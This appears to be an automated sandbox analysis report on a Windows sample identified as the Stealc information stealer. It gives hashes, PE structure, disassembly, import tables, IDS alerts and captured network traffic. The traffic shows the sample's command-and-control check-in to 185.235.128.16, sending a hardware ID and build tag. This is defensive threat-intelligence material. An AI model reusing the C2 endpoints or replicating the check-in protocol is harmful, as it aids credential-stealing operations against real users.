                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | NGy4YdKSwE.exe | Get hash | malicious | Stealc, Vidar | Browse | 45.88.105.194
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | 5BQwrSLxIZ.exe | Get hash | malicious | Stealc | Browse | 45.88.76.238
                                           No context
                                           No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9645859330758414
                                          Encrypted:false
                                          SSDEEP:192:z3uoke0KZkOqfjsqZrP2izuiFKZ24IO8X:LuokFKZkOqfjlFzuiFKY4IO8X
                                          MD5:011224C81A5E7B6B283DF7665C4E6E9B
                                          SHA1:425527416EC4059921605BB561A73D501F17FBCD
                                          SHA-256:8476C22136871A13FC7BEED7A8BFABB9162EF33C54C25423FC39A8EEE628509B
                                          SHA-512:35C6D189E2F3D79F113AF63C2D8188F5C37D379FF65772C7AFF1E4251D83B8E796D92244CE3CD52995C56EB1D84CECF52437CB06DC882C912F657938C2178227
                                          Malicious:true
                                          Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Thu Oct 31 23:27:00 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):65108
                                          Entropy (8bit):1.8995493248004316
                                          Encrypted:false
                                          SSDEEP:384:Grqvn2/MGgEdGDacfdGNbuVg0qVSzX0j3:G2/25gEwacANaVg0nz8
                                          MD5:11F37C28BA2A1598BF47C41EB03F3B02
                                          SHA1:C1AB23BC3DA9CBBB5990265CD0B638E0799EC0D0
                                          SHA-256:AF7D58903BF01888C4C82369A76E9A522D7A36C3169E37FE1AF214A753EF8069
                                          SHA-512:E7BA6048BCB61AE28EC38816413FE6ED5767A11FB0A8DFF1ED966F75BFD5E669C4A234AEE3CA5BB75CE5646CB7B5E8C47194EB6C989AB64E928E27B9497379AC
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8334
                                          Entropy (8bit):3.702088445831646
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJeN6dYEDZd6Y9SSUiGgmf6opDQ89bVL2sf0Aavzm:R6lXJk6dYid6YISUiGgmf6oVLVfTaq
                                          MD5:A73DC4B6B5B80EAC8EF88F56D87E09BB
                                          SHA1:E5C9A48E66DC62874F36246A5602E3E8DCD1A861
                                          SHA-256:D7E2F0E00DD24AB98927A3C8B6E15B13DA88687F573A45EA038A11A69BD91801
                                          SHA-512:225989B5A8CBEEAFDA1D255E2E9A5C5558A0AC07C3386693FE17ED1A68BD4B9D0C4CE7EDBF14BCBBD4C2CB396F3832731DFEE6570BEB44C6390EACA9DEC6C49F
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4579
                                          Entropy (8bit):4.491434509286758
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsOJg77aI9YLWpW8VYmYm8M4JQSvFcFrh+q81EGgI9nbqzHF19d:uIjfEI7q67V2JQ2F+hkEGXmzl19d
                                          MD5:631FFF3C61C4096673CD948225F2B858
                                          SHA1:1291254831738A60D5A4257C6E46D5E406E28CB3
                                          SHA-256:19C41E640185866BE3E205E34CF23410C6AECC67CF8F8D114F3B45ED603A606F
                                          SHA-512:A5517A4187383626188C1C881BB01D4393D68BB38B47F7DFC6262A3239C28382F8A115C2382D79C93B6BE90C67D9D3A8C710DD7DAB3B9590C064C56600D13CC6
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.465440225227793
                                          Encrypted:false
                                          SSDEEP:6144:+IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNOdwBCswSbT:TXD94+WlLZMM6YFHQ+T
                                          MD5:4DDFDAF34FFAC067A05891A92976DAA2
                                          SHA1:06559F3352516C22D52FA42B912671F9202C63F2
                                          SHA-256:5B8FBBACCF367A71B3E17412735E214F4B59209E64888F5E17C3961C45C1C15E
                                          SHA-512:B474A066EEC10B59D36BDAF031B461C833F0AD94960A65E10919D560418337799C0A91D88FCEB7B19BAFDAC3D2A4DDE011AC2C3C7147CD5C10B11094FBAC3B8F
                                          Malicious:false
                                          Reputation:low
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.321067041627892
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.55%
                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:XJQkTVvJ3I.exe
                                          File size:712'704 bytes
                                          MD5:85bb8945ac7b0a1ceeb1f3783168b6ea
                                          SHA1:c8f62675f94208f80d9ac054963e87583cf01680
                                          SHA256:78f70275d462340e3f57293641aedd5de6112df4b51c1d9d11d35676260c147c
                                          SHA512:31826d492b5d6c53ceee068dc0a920c46c324604d69c9e25ff4bc23373aff756152b4cd9030b0b4d5fa5bddc7f789d23782696c916337aa3739f59fbc2e74cad
                                          SSDEEP:12288:pmqHGU8sNLDze0yUA1EkrogYuc+SXgo5tBzYc7spg0FsE8uopVxVSr:pVmDstB/AGk9ego5tZsC0NG/VS
                                          TLSH:1CE4022363B1BC65C46A46B24D1EC7E4362EB0317E5DEF6632196E6B08702B2D173753
                                          Icon Hash:63796de971436e0f
                                          Entrypoint:0x404fb0
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64D273DE [Tue Aug 8 16:57:02 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:aff85f3e0949a3cfaa949ee7b7bc4b42
                                          Instruction
                                          call 00007FBE78E3A31Dh
                                          jmp 00007FBE78E3750Eh
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          mov eax, dword ptr [ebp+08h]
                                          xor ecx, ecx
                                          cmp eax, dword ptr [00497010h+ecx*8]
                                          je 00007FBE78E376A5h
                                          inc ecx
                                          cmp ecx, 2Dh
                                          jc 00007FBE78E37683h
                                          lea ecx, dword ptr [eax-13h]
                                          cmp ecx, 11h
                                          jnbe 00007FBE78E376A0h
                                          push 0000000Dh
                                          pop eax
                                          pop ebp
                                          ret
                                          mov eax, dword ptr [00497014h+ecx*8]
                                          pop ebp
                                          ret
                                          add eax, FFFFFF44h
                                          push 0000000Eh
                                          pop ecx
                                          cmp ecx, eax
                                          sbb eax, eax
                                          and eax, ecx
                                          add eax, 08h
                                          pop ebp
                                          ret
                                          call 00007FBE78E39F52h
                                          test eax, eax
                                          jne 00007FBE78E37698h
                                          mov eax, 00497178h
                                          ret
                                          add eax, 08h
                                          ret
                                          call 00007FBE78E39F3Fh
                                          test eax, eax
                                          jne 00007FBE78E37698h
                                          mov eax, 0049717Ch
                                          ret
                                          add eax, 0Ch
                                          ret
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          call 00007FBE78E37677h
                                          mov ecx, dword ptr [ebp+08h]
                                          push ecx
                                          mov dword ptr [eax], ecx
                                          call 00007FBE78E37617h
                                          pop ecx
                                          mov esi, eax
                                          call 00007FBE78E37651h
                                          mov dword ptr [eax], esi
                                          pop esi
                                          pop ebp
                                          ret
                                          push 0000000Ch
                                          push 00495520h
                                          call 00007FBE78E38540h
                                          mov ecx, dword ptr [ebp+08h]
                                          xor edi, edi
                                          cmp ecx, edi
                                          jbe 00007FBE78E376C0h
                                          push FFFFFFE0h
                                          pop eax
                                          xor edx, edx
                                          div ecx
                                          cmp eax, dword ptr [ebp+0Ch]
                                          sbb eax, eax
                                          inc eax
                                          jne 00007FBE78E376B1h
                                          call 00007FBE78E37623h
                                          mov dword ptr [eax], 0000000Ch
                                          push edi
                                          push edi
                                          push edi
                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022
                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x958fc | 0x28 | .text
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x10550 | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2eb000 | 0xc30 | .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3f70 | 0x40 | .text
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1a0 | .text
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x95250 | 0x95400 | 52e078286856cdfe9654fab5aafdc27a | False | 0.8623979271356784 | data | 7.617064064595542 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x97000 | 0xade8 | 0x6200 | dfff8914e234ae930fc4f02bbb0d5be7 | False | 0.08653539540816327 | data | 1.0320790307906098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.filidow | 0xa2000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.yegih | 0xa3000 | 0xd6 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xa4000 | 0x246550 | 0x10600 | 2861680e18068e8453ba9a02b96004c8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2eb000 | 0x18f4 | 0x1a00 | c7dd24e148417d8b66e913c9aa86953d | False | 0.4071514423076923 | data | 4.016815621490853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PONUFIKOHEWIHUJAFEXOVUD | 0xad8e8 | 0x9e7 | ASCII text, with very long lines (2535), with no line terminators | Tamil | India | 0.6047337278106509
PONUFIKOHEWIHUJAFEXOVUD | 0xad8e8 | 0x9e7 | ASCII text, with very long lines (2535), with no line terminators | Tamil | Sri Lanka | 0.6047337278106509
VIDUHAVOCOKUVIZAVAMUDUVUZINA | 0xaf640 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | India | 0.5871393453228102
VIDUHAVOCOKUVIZAVAMUDUVUZINA | 0xaf640 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | Sri Lanka | 0.5871393453228102
YUFABIX | 0xae2d0 | 0x136f | ASCII text, with very long lines (4975), with no line terminators | Tamil | India | 0.5939698492462312
YUFABIX | 0xae2d0 | 0x136f | ASCII text, with very long lines (4975), with no line terminators | Tamil | Sri Lanka | 0.5939698492462312
RT_CURSOR | 0xb14d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755
RT_CURSOR | 0xb2378 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018
RT_CURSOR | 0xb2c20 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751
RT_ICON | 0xa4680 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5403225806451613
RT_ICON | 0xa4680 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5403225806451613
RT_ICON | 0xa4d48 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.4117219917012448
RT_ICON | 0xa4d48 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.4117219917012448
RT_ICON | 0xa72f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.44858156028368795
RT_ICON | 0xa72f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.44858156028368795
RT_ICON | 0xa7788 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.49173773987206826
RT_ICON | 0xa7788 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.49173773987206826
RT_ICON | 0xa8630 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.47247292418772563
RT_ICON | 0xa8630 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.47247292418772563
RT_ICON | 0xa8ed8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.434971098265896
RT_ICON | 0xa8ed8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.434971098265896
RT_ICON | 0xa9440 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.27977178423236515
RT_ICON | 0xa9440 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.27977178423236515
RT_ICON | 0xab9e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.28775797373358347
RT_ICON | 0xab9e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.28775797373358347
RT_ICON | 0xaca90 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.3086065573770492
RT_ICON | 0xaca90 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.3086065573770492
RT_ICON | 0xad418 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3404255319148936
RT_ICON | 0xad418 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3404255319148936
RT_DIALOG | 0xb3418 | 0x58 | data | | | 0.8977272727272727
RT_STRING | 0xb3470 | 0x346 | data | Tamil | India | 0.46420047732696895
RT_STRING | 0xb3470 | 0x346 | data | Tamil | Sri Lanka | 0.46420047732696895
RT_STRING | 0xb37b8 | 0x36e | data | Tamil | India | 0.4715261958997722
RT_STRING | 0xb37b8 | 0x36e | data | Tamil | Sri Lanka | 0.4715261958997722
RT_STRING | 0xb3b28 | 0x672 | data | Tamil | India | 0.42424242424242425
RT_STRING | 0xb3b28 | 0x672 | data | Tamil | Sri Lanka | 0.42424242424242425
RT_STRING | 0xb41a0 | 0x3b0 | data | Tamil | India | 0.4523305084745763
RT_STRING | 0xb41a0 | 0x3b0 | data | Tamil | Sri Lanka | 0.4523305084745763
RT_ACCELERATOR | 0xb1478 | 0x58 | data | Tamil | India | 0.7954545454545454
RT_ACCELERATOR | 0xb1478 | 0x58 | data | Tamil | Sri Lanka | 0.7954545454545454
RT_GROUP_CURSOR | 0xb3188 | 0x30 | data | | | 0.9375
RT_GROUP_ICON | 0xa7758 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0xa7758 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_GROUP_ICON | 0xad880 | 0x68 | data | Tamil | India | 0.7019230769230769
RT_GROUP_ICON | 0xad880 | 0x68 | data | Tamil | Sri Lanka | 0.7019230769230769
RT_VERSION | 0xb31b8 | 0x25c | data | | | 0.5447019867549668
DLL | Import
KERNEL32.dll | GetComputerNameA, GetTempFileNameW, WriteConsoleInputW, GetConsoleAliasExesA, CallNamedPipeA, InterlockedIncrement, OpenJobObjectA, InterlockedDecrement, GetCurrentProcess, GetComputerNameW, GetTimeFormatA, FreeEnvironmentStringsA, GetCommConfig, GetDllDirectoryW, GetNumberFormatA, ClearCommBreak, EnumTimeFormatsW, TlsSetValue, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, GetFileAttributesW, CreateProcessA, GetModuleFileNameW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GlobalUnfix, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, SetFileAttributesA, LoadLibraryA, SetEnvironmentVariableA, GetModuleFileNameA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetVersionExA, ReadConsoleInputW, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, GetModuleHandleA, RaiseException, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, SetFilePointer, SetEndOfFile, GetProcessHeap, ReadFile, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T00:27:00.114024+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.235.128.16 | 80 | TCP
2024-11-01T00:27:16.904776+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49737 | TCP
2024-11-01T00:27:55.791732+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49743 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 00:26:58.988986015 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:26:58.994076967 CET | 80 | 49730 | 185.235.128.16 | 192.168.2.4
Nov 1, 2024 00:26:58.994148016 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:26:58.994386911 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:26:58.999147892 CET | 80 | 49730 | 185.235.128.16 | 192.168.2.4
Nov 1, 2024 00:26:59.849078894 CET | 80 | 49730 | 185.235.128.16 | 192.168.2.4
Nov 1, 2024 00:26:59.849275112 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:26:59.851385117 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:26:59.856163025 CET | 80 | 49730 | 185.235.128.16 | 192.168.2.4
Nov 1, 2024 00:27:00.113955021 CET | 80 | 49730 | 185.235.128.16 | 192.168.2.4
Nov 1, 2024 00:27:00.114023924 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:27:05.249753952 CET | 80 | 49730 | 185.235.128.16 | 192.168.2.4
Nov 1, 2024 00:27:05.249866962 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
Nov 1, 2024 00:27:26.469217062 CET | 49730 | 80 | 192.168.2.4 | 185.235.128.16
                                          • 185.235.128.16
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.235.128.16 | 80 | 6588 | C:\Users\user\Desktop\XJQkTVvJ3I.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 00:26:58.994386911 CET | 89 | OUT | GET / HTTP/1.1
                                          Host: 185.235.128.16
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
Nov 1, 2024 00:26:59.849078894 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 31 Oct 2024 23:26:59 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
Nov 1, 2024 00:26:59.851385117 CET | 418 | OUT | POST /562c1eb14955c897.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                          Host: 185.235.128.16
                                          Content-Length: 217
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 41 44 39 35 35 30 30 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a
Data Ascii:
------HJJJDAEGIDHCBFHJJJEG
Content-Disposition: form-data; name="hwid"

C12AD95500561166170430
------HJJJDAEGIDHCBFHJJJEG
Content-Disposition: form-data; name="build"

LogsDiller
------HJJJDAEGIDHCBFHJJJEG--
Nov 1, 2024 00:27:00.113955021 CET | 210 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 31 Oct 2024 23:26:59 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 8
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                          Data Ascii: YmxvY2s=


Target ID: 0
Start time: 19:26:57
Start date: 31/10/2024
Path: C:\Users\user\Desktop\XJQkTVvJ3I.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\XJQkTVvJ3I.exe"
Imagebase: 0x400000
File size: 712'704 bytes
MD5 hash: 85BB8945AC7B0A1CEEB1F3783168B6EA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 3
Start time: 19:26:59
Start date: 31/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332
Imagebase: 0x8a0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                            Execution Graph

Execution Coverage: 3.6%
Dynamic/Decrypted Code Coverage: 68.7%
Signature Coverage: 14%
Total number of Nodes: 1365
Total number of Limit Nodes: 26
45039->45040 45041 402b1e 45040->45041 45042 404610 34 API calls 45041->45042 45043 402b37 45042->45043 45044 404610 34 API calls 45043->45044 45045 402b50 45044->45045 45046 404610 34 API calls 45045->45046 45047 402b69 45046->45047 45048 404610 34 API calls 45047->45048 45049 402b82 45048->45049 45050 404610 34 API calls 45049->45050 45051 402b9b 45050->45051 45052 404610 34 API calls 45051->45052 45053 402bb4 45052->45053 45054 404610 34 API calls 45053->45054 45055 402bcd 45054->45055 45056 404610 34 API calls 45055->45056 45057 402be6 45056->45057 45058 404610 34 API calls 45057->45058 45059 402bff 45058->45059 45060 404610 34 API calls 45059->45060 45061 402c18 45060->45061 45062 404610 34 API calls 45061->45062 45063 402c31 45062->45063 45064 404610 34 API calls 45063->45064 45065 402c4a 45064->45065 45066 404610 34 API calls 45065->45066 45067 402c63 45066->45067 45068 404610 34 API calls 45067->45068 45069 402c7c 45068->45069 45070 404610 34 API calls 45069->45070 45071 402c95 45070->45071 45072 404610 34 API calls 45071->45072 45073 402cae 45072->45073 45074 404610 34 API calls 45073->45074 45075 402cc7 45074->45075 45076 404610 34 API calls 45075->45076 45077 402ce0 45076->45077 45078 404610 34 API calls 45077->45078 45079 402cf9 45078->45079 45080 404610 34 API calls 45079->45080 45081 402d12 45080->45081 45082 404610 34 API calls 45081->45082 45083 402d2b 45082->45083 45084 404610 34 API calls 45083->45084 45085 402d44 45084->45085 45086 404610 34 API calls 45085->45086 45087 402d5d 45086->45087 45088 404610 34 API calls 45087->45088 45089 402d76 45088->45089 45090 404610 34 API calls 45089->45090 45091 402d8f 45090->45091 45092 404610 34 API calls 45091->45092 45093 402da8 45092->45093 45094 404610 34 API calls 45093->45094 45095 402dc1 45094->45095 45096 404610 34 API calls 45095->45096 45097 402dda 45096->45097 45098 404610 34 API calls 45097->45098 45099 402df3 45098->45099 45100 404610 34 API calls 45099->45100 45101 402e0c 45100->45101 45102 
404610 34 API calls 45101->45102 45103 402e25 45102->45103 45104 404610 34 API calls 45103->45104 45105 402e3e 45104->45105 45106 404610 34 API calls 45105->45106 45107 402e57 45106->45107 45108 404610 34 API calls 45107->45108 45109 402e70 45108->45109 45110 404610 34 API calls 45109->45110 45111 402e89 45110->45111 45112 404610 34 API calls 45111->45112 45113 402ea2 45112->45113 45114 404610 34 API calls 45113->45114 45115 402ebb 45114->45115 45116 404610 34 API calls 45115->45116 45117 402ed4 45116->45117 45118 404610 34 API calls 45117->45118 45119 402eed 45118->45119 45120 404610 34 API calls 45119->45120 45121 402f06 45120->45121 45122 404610 34 API calls 45121->45122 45123 402f1f 45122->45123 45124 404610 34 API calls 45123->45124 45125 402f38 45124->45125 45126 404610 34 API calls 45125->45126 45127 402f51 45126->45127 45128 404610 34 API calls 45127->45128 45129 402f6a 45128->45129 45130 404610 34 API calls 45129->45130 45131 402f83 45130->45131 45132 404610 34 API calls 45131->45132 45133 402f9c 45132->45133 45134 404610 34 API calls 45133->45134 45135 402fb5 